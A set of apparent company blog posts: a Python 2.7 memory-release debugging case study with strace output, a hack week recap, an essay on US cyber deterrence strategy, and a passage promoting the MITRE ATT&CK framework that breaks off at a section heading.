
Lessons Learned from Debugging Python


When developing large-scale backend code, engineers need to be able to predict how an application will behave at the system level in order to build a scalable and stable architecture. Unfortunately, high-level scripting languages tend to hide actual system behavior from developers, making troubleshooting, debugging, and scaling very difficult. Python is no exception. We recently had the chance to debug a memory-related problem in Python code. Like many dynamically typed languages, Python offers convenient features such as automatic garbage collection so developers can focus on writing business logic. However, relying solely on the correctness of that business logic can obscure problems that happen at lower levels.

In this blog, I explore our team’s debugging efforts that led to the discovery of an unpatched memory problem in the Python 2.7 that shipped with RHEL/CentOS 7.3. While new development employs Python 3, Python 2.7 on RHEL/CentOS 7 remains a popular technology stack widely trusted by enterprise customers. This case study also illustrates Endgame’s approach to bug discovery and disclosure, the challenges we encounter, and the solutions we apply when integrating open source libraries into our own software development process, including our migration to Go.

 

Background

As part of the backend engineering team, we constantly process hundreds of thousands of messages and face operational constraints that demand precision in scale, speed, and scope. Last year, we received an incident report stating that requests were not being properly processed. Most Linux distros maintain comprehensive logs, usually under the /var/log directory, with different filenames for different components. This is usually a good place to start debugging, because it provides comprehensive information on the state of the overall system.

From the log files, we found an interesting hint that indicates that our Python process was killed by the kernel’s Out Of Memory manager. The kernel log showed something similar to the output below:

[230026.780153] [55149]  1000 55149  1155060     1206     111      211             0 postmaster
[230026.780155] [62104]  1000 62104  1155060     1204     111      211             0 postmaster
[230026.780158] [66951]  1000 66951  1155060     1212     111      211             0 postmaster
[230026.780162] Out of memory: Kill process 125331 (python) score 681 or sacrifice child

 

The Out Of Memory (OOM) manager is a component of the Linux kernel. It maintains a “badness score” for each process and terminates the highest-scoring process when memory runs critically low. The heuristic for determining badness factors in the process’s memory footprint, CPU time, and runtime, along with some kernel-internal adjustments; in the end, the more memory a process uses, the higher its score. This prevents the entire system from crashing when there is not enough memory left for the kernel itself.
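As a quick illustration (our own example, Linux only, not part of the original investigation), the kernel exposes this badness score for every process under /proc, so it can be read directly, for example from Python:

import os

def oom_score(pid):
    # /proc/<pid>/oom_score holds the kernel's current badness score for that process
    with open("/proc/%d/oom_score" % pid) as f:
        return int(f.read().strip())

print("OOM score for this process: %d" % oom_score(os.getpid()))

The higher the score relative to other processes, the more likely the OOM killer is to pick that process when memory runs out.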

Further tracing of the logs showed that the process id matched a Python process that runs database queries through an Object-Relational Mapping (ORM) library. Why was our Python code selected to be killed? Did we have a bad query that loaded too much data into process memory? Did one of the libraries we use have a memory leak? We needed to analyze the problem step by step.

 

Validating SQL

ORM frameworks are popular because they let engineers write applications that interact with databases without writing SQL, resulting in less context switching, faster development, and more readable code. An ORM does this by generating SQL on behalf of developers, providing an additional abstraction layer. However, an ORM may not always execute the exact query the developer intended: it may fetch more information from the database, or run more queries, than needed. This often makes debugging more difficult.

Fortunately, most ORM libraries provide ways to show the actual SQL queries that are run against the Relational Database Management System (RDBMS). Even without such features, most RDBMSs can log statements on the server side. Because what the database sees is what matters most, we extracted the SQL statements from the database server and validated that the query was constructed and executed as intended.
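As an illustration (a hypothetical model and an in-memory SQLite engine, not the code from this incident), here is how a SQLAlchemy-style ORM can be made to show the SQL it generates, either by echoing statements on the engine or by rendering a query object to a string:

from sqlalchemy import Column, Boolean, Integer, create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker

Base = declarative_base()

class Task(Base):
    __tablename__ = "tasks"
    task_id = Column(Integer, primary_key=True)
    account_id = Column(Integer)
    ready = Column(Boolean)

engine = create_engine("sqlite://", echo=True)  # echo=True logs every statement the ORM emits
Session = sessionmaker(bind=engine)
session = Session()

query = session.query(Task).filter_by(account_id=1234, ready=True)
print(str(query))  # prints the generated SELECT without executing it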

Python code

result = session.query(Task).filter_by(account_id=account_id, ready=True).all()

 

Actual query observed on the server side

< 2017-12-09 00:22:32.283 UTC >LOG:  statement: SELECT tasks.task_id AS tasks_task_id, tasks.account_id AS tasks_account_id, tasks.user_id AS tasks_user_id
        FROM tasks
        WHERE tasks.account_id = '####' AND tasks.ready = 'true'

 

The generated query looks as expected. If our query matches expectations, then the problem must be located at a lower layer, so we moved on to the next step, which is tracing our code using Python Debugger (pdb).

 

Python Debugger

Python comes with a handy debugger. If the source code is accessible, the simplest way to run the debugger is to import the pdb module and add the line pdb.set_trace() where you want execution to pause. From there, each function call can be explored. Even better, one can import additional modules that may help with debugging. Because we were interested in the memory usage of the code, we measured it with top. Among the many metrics top reports, we care about the “resident memory” column (RES), which reflects the amount of physical memory the process is using. With one terminal running the debugger and another running top, we were ready for memory analysis.
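As a convenience (a helper written for illustration, Linux only; it is not part of pdb), the resident set size can also be read from /proc at the pdb prompt instead of switching to the top terminal:

import os

def resident_memory_kb():
    # VmRSS in /proc/<pid>/status is the resident set size, i.e. the RES column in top
    with open("/proc/%d/status" % os.getpid()) as f:
        for line in f:
            if line.startswith("VmRSS:"):
                return int(line.split()[1])  # value is reported in kB

print("RES: %s kB" % resident_memory_kb())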

 

 

Stepping through each line of the code while observing resident memory size, we traced the code to the section where our process allocates space to hold the database query results. Since the Python runtime handles garbage collection, we expected the space allocated for the ORM query results to be returned to the operating system once the variables went out of scope.

 

 

However, even with the variable out of scope, the process still didn't free the memory; usage remained at several GB. Did our library have a memory leak? After quickly Googling for known leaks and stepping through the library code, we found no obvious indication of one.

Did our code still hold references to the objects? Most garbage collectors rely on reference counting: the runtime keeps a count of references to each object it creates and reclaims an object once nothing refers to it anymore. This is convenient because engineers do not need to manage memory themselves; the system takes care of it. However, it also means the space won’t be freed until all references to an object are gone. If any code or library still held references to the objects without our knowing it, the space would never be cleaned up by the garbage collector. This can be checked quickly by calling the gc module’s get_count() function before and after the code snippet in question. We did not see any evidence of additional references being created.
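A minimal sketch of that check, using a stand-in allocation rather than the real ORM results:

import gc

before = gc.get_count()                                # the collector's per-generation counters
data = [{"EndgameRules": x} for x in range(1000000)]   # stand-in for the ORM query results
del data
after = gc.get_count()

print("gc counts before: %s, after: %s" % (before, after))

A large lingering difference after the del would suggest that something still holds references to the objects.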

We next explored the possibility that our debugging session was influencing the timing of garbage collection. Based on how the code reads and how Python cleans up memory, the space should have been released. To rule this out, we triggered garbage collection manually through the Garbage Collector interface (gc.collect()). It didn’t help: resident memory usage stayed above several GB.

Next, we removed third-party library code from our logic to eliminate variables that might distract from the root cause and checked whether the symptom persisted. We stripped out as much third-party code as possible without changing the original logic. Indeed, we were able to reproduce the same symptom without any third-party library calls, purely from our own business logic.

At this point, we realized that it was not the logic of our application, nor the library code. Something else was happening, so we decided to inspect system calls.

 

Isolating problems

When inspecting system calls, it is important to eliminate as much noise as possible. Because system call tracing of high-level languages generates a lot of noise, we created the bare minimum of code that reproduced the same symptom. This can be achieved by focusing on the suspicious section of code and repeatedly eliminating lines that do not change the behavior of the core section. Here’s a simplified version of the code snippet:

 

Note: Be careful. The following code may eat 1.5 GB of your memory!

1  import gc
2  import pdb
3  d = [ {'EndgameRules': 1} for x in xrange(10000000)]
4  pdb.set_trace()
5  del d
6  gc.collect()
7  # we need to pause here

 

Here, we construct a list of small objects, in this case dictionaries containing a single item. This is typical of what an ORM library does: when we select records using the ORM, it constructs a list of small objects containing the data from the table columns. The only reason we generate such a large list is to make the memory increase more noticeable, since small changes in memory are harder to spot. Using this code, we reproduced resident memory usage above 1.5 GB. Note that we intentionally executed gc.collect(). Most Python developers would agree that the memory allocated on line 3 should be returned to the system at line 5. In reality, however, memory usage remains high after line 5, and it stays high even after garbage collection is triggered. Let’s take the gc and pdb modules out of our code snippet and observe the system calls it generates.

 

Deeper Dive

We had already checked whether we could reproduce this problem on versions of Python newer than 2.7.6 and noticed a difference. The next step was to figure out what was causing it. We compared the system calls generated by this snippet on Python 2.7.6 on CentOS 7 and Python 2.7.12 on Ubuntu 16.04. Strace is an awesome utility for system call analysis. The easiest way to run it is to execute strace on the command line followed by the command you want to trace. It is usually a good idea to write the output to a file, as strace output tends to be very long; note that strace writes its trace to stderr by default, so use the -o flag. For us, the command was strace -o strace_output.txt python python_code.py.

The following sample code creates and deletes a list of Python dictionaries.

a = [ {"EndgameRules": x} for x in xrange(5000000)]
del a

 

Strace output for Python 2.7.6 on CentOS 7.3

munmap(0x7f0b2c39e000, 8192)            = 0
brk(NULL)                               = 0x1f2e000
brk(0x1f4f000)                          = 0x1f4f000
brk(NULL)                               = 0x1f4f000
brk(0x1f70000)                          = 0x1f70000
brk(NULL)                               = 0x1f70000
brk(0x1f91000)                          = 0x1f91000
brk(NULL)                               = 0x1f91000
brk(0x1fb2000)                          = 0x1fb2000
brk(NULL)                               = 0x1fb2000
brk(0x1fd4000)                          = 0x1fd4000
… Truncated …
brk(NULL)                               = 0x5e664000
brk(0x5e685000)                         = 0x5e685000
munmap(0x7f814c1a8000, 40218624)        = 0
rt_sigaction(SIGINT, {SIG_DFL, [], SA_RESTORER, 0x7f8156d695e0}, {0x7f815708c540, [], SA_RESTORER, 0x7f8156d695e0}, 8) = 0
brk(NULL)                               = 0x5e685000
brk(NULL)                               = 0x5e685000
brk(0x1404000)                          = 0x1404000
brk(NULL)                               = 0x1404000
exit_group(0)                           = ?
+++ exited with 0 +++

 

Strace output for Python 2.7.12 on Ubuntu 16.04

mmap(NULL, 262144, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb7ac821000
mmap(NULL, 262144, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb7ac7e1000
mmap(NULL, 262144, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb7ac7a1000
mmap(NULL, 262144, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb7ac761000
mmap(NULL, 262144, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb7ac721000
mmap(NULL, 262144, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fb7ac6e1000
… Truncated …
munmap(0x7f913380c000, 262144)          = 0
munmap(0x7f913384c000, 262144)          = 0
munmap(0x7f913388c000, 262144)          = 0
munmap(0x7f91338cc000, 262144)          = 0
munmap(0x7f913390c000, 262144)          = 0
munmap(0x7f913394c000, 262144)          = 0
munmap(0x7f913398c000, 262144)          = 0
munmap(0x7f91339cc000, 262144)          = 0
munmap(0x7f90e0d21000, 40218624)        = 0
rt_sigaction(SIGINT, {SIG_DFL, [], SA_RESTORER, 0x7f91349e9390}, {0x534a20, [], SA_RESTORER, 0x7f91349e9390}, 8) = 0
brk(0x162e000)                          = 0x162e000
munmap(0x7f90d9aa1000, 262144)          = 0
exit_group(0)                           = ?
+++ exited with 0 +++

 

Notice that we see more brk() calls in Python 2.7.6 and more mmap() calls in Python 2.7.12. mmap() is a well-known system call that “creates a new mapping in the virtual address space of the calling process.”

But what is brk()? According to the Linux man page, “brk() changes the location of the program break… Increasing the program break has the effect of allocating memory to the process; decreasing the break deallocates memory.” The strace output for Python 2.7.6 shows that the process increases the program break but never decreases it, even after the del a statement executes. We do see a small release of about 40 MB via munmap(), but Python 2.7.6 never returns the big chunk that was allocated with brk().

Python 2.7.12, on the other hand, uses mmap() to allocate memory. The allocated memory is released upon del a with munmap() calls, returning most of the memory to the OS. This is the expected behavior. So why the discrepancy?

 

Why the Difference?

Python 2.7.6 was released in November 2013. This bug is not new: it was reported years ago, patches followed, and the behavior is referenced in Python’s documentation.

In version 2.7.7, the arena allocator was changed to use mmap() where available. The arena allocator handles Python objects smaller than 512 bytes and manages memory in mappings called arenas, each with a fixed size of 256 KiB.

From that documentation, we also validated that this only becomes a big problem when a process expands its arena space by creating many small objects under 512 bytes, which is exactly what commonly happens in code that uses an ORM.

This behavior is not a memory leak. Python’s runtime will reuse the expanded space to hold other objects whenever it is not occupied. However, no other process on the system can use that memory, even if Python never needs it again. To use an analogy, the runtime behaves like a kid who won’t share toys after playing with them. That means that in a long-running job, such as a web service that happens to allocate many objects under 512 bytes, the memory won’t be returned to the system until the Python process terminates.

To work around this problem, keep arena space under control by limiting the number of small objects Python creates at any one time, for example by fetching fewer rows from the database with stricter query filters. Even with this measure, the problem is hard to anticipate, because the behavior is not visible from Python code that fetches data through an ORM.
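A hypothetical sketch of that mitigation, reusing the Task model and session from the earlier snippets: fetch rows in bounded batches instead of materializing the full result list, so the process never holds millions of small objects at once.

BATCH_SIZE = 1000

def tasks_in_batches(session, account_id):
    # Pull matching rows in fixed-size chunks so arena growth stays bounded
    offset = 0
    while True:
        batch = (session.query(Task)
                        .filter_by(account_id=account_id, ready=True)
                        .order_by(Task.task_id)
                        .limit(BATCH_SIZE)
                        .offset(offset)
                        .all())
        if not batch:
            break
        for task in batch:
            yield task
        offset += BATCH_SIZE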

We only saw the bug in the Python 2.7 shipped with RHEL/CentOS 7.3. Python 2.7.7 and later, as available on Ubuntu 16.04 and 17.04, do not exhibit the problem, and Macs are unaffected because they ship later releases. We disclosed this bug to Red Hat, and the vendor addressed it in the RHEL 7.5 release. We appreciate the patch and hope this example highlights our approach to debugging, some of the key decisions to make along the way, and the challenges of writing a scalable application.

 

Conclusion

Thanks to dynamically typed languages and third-party libraries, engineers can build things quickly and implement their ideas without many obstacles. However, dynamically typed languages combined with lots of libraries introduce so much abstraction that the computer does not necessarily behave the way the source code suggests. When building an application that processes a lot of data in parallel, the correctness of our mental model is crucial. Application code reflects an engineer’s mental model, and if the system does not abide by that model, it can lead to countless hours spent debugging.

Knowing this, we have migrated most of our components that require high performance and scalability away from Python and into Go. Go’s runtime still provides some level of abstraction, but we find it more efficient, more straightforward, and less surprising. For the most part, a process implemented in Go behaves according to how it is written. We still use Python where appropriate: quick prototypes, small tools, or small-scale work. But new projects will most likely be written in Go.

If you find yourself relying on a dynamically typed language and third-party libraries, ask yourself whether any magical behavior or convenience feature could lead the system to behave differently than your mental model expects. This gap may be difficult to identify until there is a problem. In the case of this Python bug, we didn’t recognize the deviation from our mental model until it came to our attention that requests weren’t being processed as intended. To ensure our systems behave as intended, we constantly seek ways to limit abstraction and gain efficiencies. While learning a new language such as Go may seem like additional work, we believe it has increased our reliability and productivity while limiting the time we spend debugging through layers of abstraction.


Hack Week @ Endgame


Earlier this year, Endgame hosted its annual all-hands meeting, bringing together our team from across the country for internal discussions, technical talks, and social events. This was followed by our hack week, where individuals submitted proposals, built teams, learned new skills, and tackled projects together focused on product features and workflow optimization. This year’s hack week was our most successful to date, both for the solutions developed and knowledge shared and for its lasting impact on cross-team collaboration and our innovative culture. Taking time away from day-to-day pressures and deadlines may seem like a luxury, but we view it as a necessity: it delivers business value and helps us maintain an innovative culture and a cutting-edge team as we grow. This year, we organized hack week with a few underlying objectives in mind. I’ll walk through my perspective on the essential role of hack week for our team and highlight some of the projects and the value they added for the broader team.

 

Cultural Significance

When organizing this year’s hack week, we had a few core objectives. These can be bucketed into people, processes, and technology. Starting with technology, we wanted to empower engineers and researchers with an opportunity for greater autonomy to choose a specific problem and develop their own solutions. We want to stay on top of the latest technologies, learn new languages, and take risks that might stray from our product roadmap. As all developers can relate, we sometimes have important tech-debt items that we want to fix but just need the time. Hack week provides this opportunity to create innovative solutions to important technical problems we face every day.

Most of the year, guidance on features and priorities comes (understandably) from product management. In contrast, hack week allows the team to focus on those advances that are directly relevant to our platform, without looking for space on the latest product roadmap. Hack week offers engineers and researchers the responsibility to propose, choose, and justify their projects, which may be outside of the immediate roadmap, customer requests, or bugs. This is one of the most liberating aspects of hack week, as it emphasizes  and encourages the autonomy to independently develop proposals, collaborate with different team members, and test or learn new skills. Engineers and researchers are up-to-date on advances in malware methods and prevention techniques, and so our team keeps a list of topics and small experiments they want to try to maximize impact. For example, one team worked to stretch Endgame’s HA-CFI protection to new platforms that are difficult to monitor and detect on. If the teams are successful, these outcomes will most likely be incorporated in the next few releases of the product.

Finally, it is not simply lip service to highlight the essential role of culture in building a great company and an industry-changing product. We take this very seriously and view it as a core competitive advantage. Hack week provides a unique opportunity for collaboration between people who ordinarily don’t work together. Our team is composed of engineers, testers, user experience designers, site reliability engineers, and researchers with diverse backgrounds and unique experiences from their past lives in private industry, consulting, the military, and government security. Hack week is where much of that energy and experience converges to build cool new features and share skills that will give Endgame an advantage over the competition.

 

Highlights

Let’s take a look at some of this year’s projects to illustrate their range and the big swings taken. Although individuals had a few weeks to brainstorm ideas and build teams, realistically most development took place over a 48-hour period. Projects addressed a range of new features and challenges, including UX, data science, and tradecraft analytics. Two of these projects are described below.

At Endgame, we understand that our product will be judged by how quickly and easily we can triage problems and stop attacks. With that in mind, the team below built SMP Health, a monitoring console for our Management Platform. We have been using tools like New Relic and Splunk for monitoring, but they only loosely match our needs. This new tool pulls out precisely the performance characteristics and resource consumption of the services we care about most. It will help developers, scale engineers, and customer support. Importantly, it also gave a team member the opportunity to learn Go (for more on our move to Go, and why this kind of debugging would not be needed after the switch, check out our blog post on debugging Python above).

 

Chan and Nayarra of the SMP Health Team


In another project, the Streamline Models team revamped a slow, expensive, and labor-intensive process for generating malware machine learning (ML) models. They cut the time and expense dramatically by ruthlessly automating our malware research and development processes. We can now develop ML models faster and apply them to more problems, such as macOS malware, macros, or PDFs. This will help Endgame improve detection and prevention rates and become even more responsive to false positives experienced by our customers.

 

Our Streamline Models team, comprised of data scientists, frontend engineers, and site reliability engineers

 

Back to Business?

One of the biggest misperceptions about hack week is that it can turn into a boondoggle, where engineers and researchers spend a week building novelty projects with no business value. Of course, without oversight and good planning, this can happen. However, from the beginning we invited corporate leadership into the planning process and the proposal reviews, and they were part of our Shark Tank-style judging and awards ceremony at the end of the week. Bridging the gap between corporate leadership and our engineers and researchers proved essential to the success of hack week and ensured our goals were achieved. Rather than being a break from business as usual, hack week directly supports business imperatives while advancing innovation and enhancing our culture.

 

Corporate leadership participated in judging the final projects that were presented to the entire company

 

In short, our 2018 hack week exceeded our expectations and raised the bar for future hack weeks. For others thinking about implementing a hack week, there are a few key takeaways. Focus on short, experimental projects that teams will attempt to prove viable. Encourage taking risks and failing fast. Encourage collaboration between people who ordinarily don’t work together. Share skills. Bring the whole company into the process for broader support and impact. We learned a lot throughout hack week, and look forward to building upon this momentum and the new connections, capabilities, and skills gained throughout the week.

Toward a Cyber Deterrence Strategy?


Almost a year to the day after the White House cybersecurity executive order, the Department of Homeland Security (DHS) last week released a new Cybersecurity Strategy. The DHS strategy reinforces its role as the key authority for defending against and preventing cyber attacks within the United States, noting the ten-fold increase in cyber incidents reported on federal systems between 2006 and 2015 and the need to build a resilient cybersecurity ecosystem.

The DHS Strategy follows the March release of the Command Vision for US Cyber Command, which outlines the new Unified Combatant Command’s objective to, “Achieve and maintain superiority in the cyberspace domain to influence adversary behavior, deliver strategic and operational advantages for the Joint Force, and defend and advance our national interests.” The Vision outlines the aim to achieve superiority in cyberspace through persistence, defending forward, and engaging adversaries.

Together, these two strategic documents touch upon two major aspects of deterrence – deterrence by denial and deterrence by punishment. With the release of a national strategy on cyber deterrence delayed in the National Security Council, these two documents may add insight into what may emerge in the new strategy, while also revealing some of the many remaining challenges. Importantly, they demonstrate the necessity for and challenges with reimagining deterrence for the digital age, which requires a whole of society approach and better defined parameters for what to deter in the first place.

 

Reimagining Deterrence

Deterrence is a strategy to dissuade or prevent adversaries from taking specific actions. Most deterrence frameworks are based on nuclear deterrence and Cold War dynamics, and are ill-equipped to handle the nuances of the cyber domain. As both the DHS and Cyber Command strategies highlight, the bipolar international system of the Cold War no longer exists; it has been replaced with several near-peer adversaries, criminal groups, mercenaries, terrorist organizations, and lone wolves who can access open source nation-state cyber capabilities. The asymmetric nature of cyberspace shifts the fundamentals of power; misperception and misattribution are heightened; and, of course, all of the challenges of nuclear proliferation and traditional kinetic attacks still exist. Moreover, while nuclear deterrence focuses on deterring nuclear attacks, the parameters for cyber deterrence remain ambiguous. Is it based on preventing certain effects, such as the destruction of critical infrastructure? Or on preventing certain kinds of malicious activity, such as cryptojacking or ransomware attacks?

While the parameters remain nebulous, there has been some progress in strategic deterrence that integrates the cyber domain. Joseph Nye recently specified four key mechanisms for deterrence: denial, punishment, entanglement, and norms. The DHS and Cyber Command strategic documents address these first two mechanisms, while referencing entanglement and norms as well, and are worth exploring.

 

Deterrence by Denial

The DHS strategy details a risk management approach, and in many regards resembles the cyber risk management models increasingly adopted in the private sector. For instance, Pillar 1 focuses on risk reduction and includes a range of focal areas, including protecting both legacy systems and cloud and shared infrastructure, and reducing risk while maximizing investments. Part of the risk management approach also includes the desire to “increasingly leverage field personnel…to encourage the adoption of cybersecurity risk management best practices.” This is referenced in the context of protecting critical infrastructure, and it will be interesting to watch whether it leads to new private-public sector collaboration frameworks. The risk management approach is echoed in the Department of Energy’s recent cybersecurity plan, and together these may signal broader government action toward minimizing risk and optimizing outcomes.

In addition to risk management, the DHS strategy emphasizes resilience, execution, and a complex-systems approach. By focusing on building resilience within an ecosystem, the strategy integrates the human and technical aspects of cybersecurity while taking steps toward better coordination between the private and public sectors. In focusing on the cyber ecosystem, the DHS Strategy inherently frames defense as a socio-technical system. This helps pull various aspects of deterrence by denial under one umbrella, including expanding the workforce, capacity building, and incident response, in addition to the technological research and development required to strengthen defenses.

 

Deterrence by Punishment

Cyber Command’s Vision similarly stresses the role of resilience but, given its new authorities and mission, takes an approach focused more on gaining superiority through persistence and active engagement. While the Vision does not emphasize traditional perspectives on deterrence, several aspects do imply deterrence by punishment and shaping the risk calculus of adversaries. In defining cyberspace superiority, the Vision focuses not only on the need for fully functioning cyber operations, but also on the security of land, air, maritime, and space forces. This is a welcome departure from dominant discussions that treat the cyber domain as a silo and ignore cross-domain effects. It reflects a growing trend, as the recent Nuclear Posture Review (NPR) integrates cross-domain deterrence by punishment. The NPR specifies that the U.S. will only consider employing a nuclear response under extreme circumstances, which may include “significant non-nuclear strategic attacks” on the U.S. or allies, a phrase that may encompass a destructive cyber attack.

The Vision also takes a broader perspective on how adversaries exploit cyberspace for their objectives. For instance, it notes, “Cyberspace capabilities are key to identifying and disrupting adversaries’ information operations.” This is closely linked to Imperative 3 and the push toward integrating cyberspace operations with information operations, acknowledging the full spectrum of potentially malicious behavior in cyberspace to which the U.S. will respond. The Vision reiterates a seamless transition between offense and defense, defending forward as much as possible to force adversaries onto the defensive, and holding them accountable for cyber attacks. Finally, the Vision focuses on achieving an overmatch of capabilities, which again affects the risk calculus of adversaries and informs deterrence.

 

Overcoming Failures of Imagination

“We must anticipate the changes that future technological innovation will bring, ensure long-term preparedness, and prevent a ‘failure of imagination.’” (DHS Strategy)
“Anticipate and identify technological changes, and exploit and operationalize emerging technologies and disruptive innovations faster and more effectively than our adversaries.” (Cyber Command Vision)
 

Authoritarian regimes and malicious non-state actors continue to creatively leverage all facets of the cyber domain to achieve a range of objectives with little gap between technology and policy. Both the DHS Strategy and Cyber Command Vision note that the U.S. gap between policy and technology must also close through anticipating, integrating, and preparing for technological change. To that end, each strategic document takes steps toward preventing strategic surprise. This includes research and development across all phases of operations, and international collaboration and partnerships. Each document also notes the necessity for shaping acceptable behavior in cyberspace, and references deterrence through the establishment of norms.

That leaves deterrence by entanglement, which is where the private sector plays a unique, unparalleled role compared to the other domains, and is rarely discussed when it comes to deterrence. Within the Cyber Command Vision, the emphasis is on leveraging the talents, products and expertise of the private sector for information sharing and capability development. The DHS Strategy similarly focuses on expanding collaboration and strengthening partnerships with the private sector. Each of these is important, especially as private sector initiatives such as the Tech Accord and Charter of Trust aim to protect the resilience, security, and privacy of cyberspace. The private sector is key to entanglement (and denial) as the owner of much of the data and infrastructure, and due to its role in cross-national economic interdependence and reliance on the Internet as a key mechanism for economic growth. This aspect of deterrence is especially relevant for US-China relations, but also applies to relatively isolated countries as well.

Finally, in the effort to better prepare for and prevent surprise, it is absolutely necessary to innovate strategic thinking on cyber deterrence. First, much greater refinement is required to identify what behavior the strategy intends to deter, and how to progress from strategy to action. Both documents note that not all malicious activity will be deterred. With everything from information operations to wiper attacks to phishing campaigns falling under the umbrella of malicious cyber activity, targeted deterrence is required to tailor and prioritize deterrence strategies against the most impactful kinds of malicious cyber activity. The recently introduced DETER Act takes steps in this direction, moving away from a one-size-fits-all approach and instead mandating distinct action plans based on the effect and the attacker. Second, cybersecurity strategies must be creative and innovative in promoting the most impactful aspects of U.S. soft power: democratic norms and civil liberties. Both the DHS and Cyber Command documents acknowledge this, emphasizing the necessity to pursue these strategies in “ways consistent with our national values and that protect privacy and civil liberties.” This is an essential component of innovation and public-private relationships, and serves as a cornerstone of U.S. soft power. However, as is common in strategic documents, it is not clear how each organization will achieve this balance, or what steps will be taken in many other areas. While the strategic documents take much-needed steps toward informing a broader national cybersecurity strategy, they should be monitored to see if and how they are translated from strategy to action.

The ATT&CK Matrix Revolution in Security


Twenty years ago, a group of infosec experts testified to Congress on the fragility of digital security. To commemorate that testimony, they returned to Capitol Hill last week with a similar conclusion. Over the last twenty years, digital security has not advanced beyond incremental changes, and it is even more complex and insecure given the greater scale and diversity of devices. A complete rethinking of defense is necessary, and technology alone will not solve the problem. It requires a re-evaluation of security programs and crafting defenses in a new way, built on an open and evolving attack model.

MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) framework addresses many of the core challenges enterprises face today. First, ATT&CK provides the most comprehensive model of modern attacker behavior. This framework can directly inform defensive and gap assessments, allowing organizations to intelligently prioritize areas for additional data collection, analysis, and detection. When operationalized, the framework moves organizations from reactive to proactive postures. Second, ATT&CK helps bridge the gap between practitioners and executives, enabling leadership to make more informed risk management and resource allocation decisions. Each of these will be discussed in turn, but first let’s take a quick look at how security arrived at the current quagmire, followed by how to operationalize the ATT&CK Matrix. With the move to this new framework, organizations can innovate all aspects of enterprise defense, and better prioritize and tailor resource allocation based upon their own unique threat model.
 

Why Current Strategies Are Not Working

Organizations cannot easily identify true gaps in their defenses due to a patchwork of one-off solutions and outdated threat models built upon a high-level view of the world, lacking the depth needed to properly describe today’s attacks. These older models either attempt to summarize the threat to the point of oversimplification, or focus too heavily on the early pre-compromise stages of the attack (i.e., exploitation and initial malware infection). This, in turn, makes it extremely difficult for security teams to understand where to spend the next dollar of funding, and for executives to explain to their boards the breadth and effectiveness of their defenses. Blind spots persist in security assessments, significantly impacting the full range of defense considerations including both resource allocation and detection.

These problems are compounded by the word salad of buzzwords that tries to catch a buyer’s eye but lacks the substance to help buyers make more informed decisions. Assessments can similarly lead to confusion, given the inconsistencies of metrics, models, and self-evaluation. Even product purchase evaluations (i.e., proofs of concept) are often not as informative as they should be. Based on evaluations I’ve observed over the years, they tend to be generic rather than tailored, and rarely dive into the depth of the problems customers encounter. A product may test well against a generic framework, but an organization’s top risks may go unaddressed because of the metrics used and a lack of transparency, and customers may even purchase products that create redundant defenses instead of addressing the real risks.

 

You Say You Want a Revolution

It’s time to progress beyond the decades of incremental changes in defenses. We need revolution, not evolution. To leapfrog, we need to understand adversary behavior: where they have gone and where they may go in the future. Fortunately, there’s a framework that does just this - MITRE’s ATT&CK Matrix.

MITRE is a U.S. not-for-profit organization managing federally funded research and development centers (FFRDCs), making them an impartial, respected, and knowledgeable voice. They have developed and help maintain the ATT&CK Matrix. According to MITRE, "ATT&CK for Enterprise is an adversary behavior model that describes the actions an adversary may take to compromise and operate within an enterprise network." Security teams that assess and validate their visibility and protection across the range of behaviors in the Matrix are those best equipped to defend against today's threats.

The ATT&CK Matrix may seem overwhelming at first glance given its coverage of hundreds of techniques and tactics (see Figure 1). The good news is full coverage is not needed to make a significant improvement to your security program. The best place to start is to learn from history. Identify those groups who have previously targeted your corporate ecosystem (e.g., parent company, supply chain, industry). With this knowledge you can begin to prioritize your ATT&CK coverage against previously observed attacks. If you do not know where to begin, MITRE’s Groups page provides an overview of attack groups and the industries they frequently target.

 

Figure 1: A Partial Screenshot of MITRE’s ATT&CK Matrix

 

MITRE also offers a free open-source tool called Navigator to help organizations understand what areas of the Matrix should be prioritized. You can select a threat group or a malicious software kit and Navigator will highlight the tactics on the ATT&CK Matrix previously utilized by that group. For example, selecting APT29 reduces the focus from over 280 individual techniques (cells in the Matrix) to just 22. This number is far easier to digest as a security team, and a plan of action can be made to ensure those areas are covered.  Advanced and well-resourced teams can dive deeper, analyzing data availability and detection capabilities for larger chunks of the Matrix and formulating plans to close gaps in response.

Aligning security priorities to ATT&CK doesn't need to be an all or nothing proposition. Even without the people in place to immediately act on the data gathered during the prioritization, the ATT&CK Matrix could still save millions in damages by reducing the time for an external incident response team to contain an attack. The visibility gained through ATT&CK can be a vital addition to an incident response plan. If you were notified of a breach today an external team would have to start from scratch: deploying their security stack, gathering data, and trying to stop the bleeding. Imagine instead if you can direct them to your data lake filled with critical information covering the depth of ATT&CK. They can immediately begin to detect and stop the adversary, greatly reducing the time to containment and stemming damage and loss.

 

Trust But Verify

With this new list of prioritized ATT&CK techniques to assess, organizations can ask security vendors to demonstrate their protections against these prioritized tactics and behaviors. Do not accept a binary “protected” or “not protected”; depth and transparency are the goal of this exercise. Only by truly understanding your gaps can you begin to build your revolutionary security operations center. With the vendors’ lists in hand, it is time to verify their claims. There are a few good free tools for testing your coverage against ATT&CK, including a free and open-source project developed by Endgame called Red Team Automation (RTA). RTA facilitates testing security stacks against ATT&CK techniques without having to detonate nation-state malware in your production environment. Dozens of scripts are available to test coverage against the prioritized list of techniques developed in the previous section.

By reducing the entire Matrix to a prioritized list of techniques used by previously observed threats, understanding your perceived coverage through visibility gap analysis informed in part or entirely by detailed reports of coverage from your vendors, and validating your coverage with free tools like Endgame RTA, you are now in a position of power. You know exactly where to focus your security program. Do you have complete gaps in the technique list? Look for (and test) technology that provides visibility, protection, or both on those cells in the Matrix. Do you have data, but lack the ability to proactively analyze the information? You may need more security analysts or better automation and security tooling. The information gleaned using the ATT&CK Matrix can inform updates to security roadmaps in a far more detailed way than saying “we need next-gen AV”.

 

Communicating Up

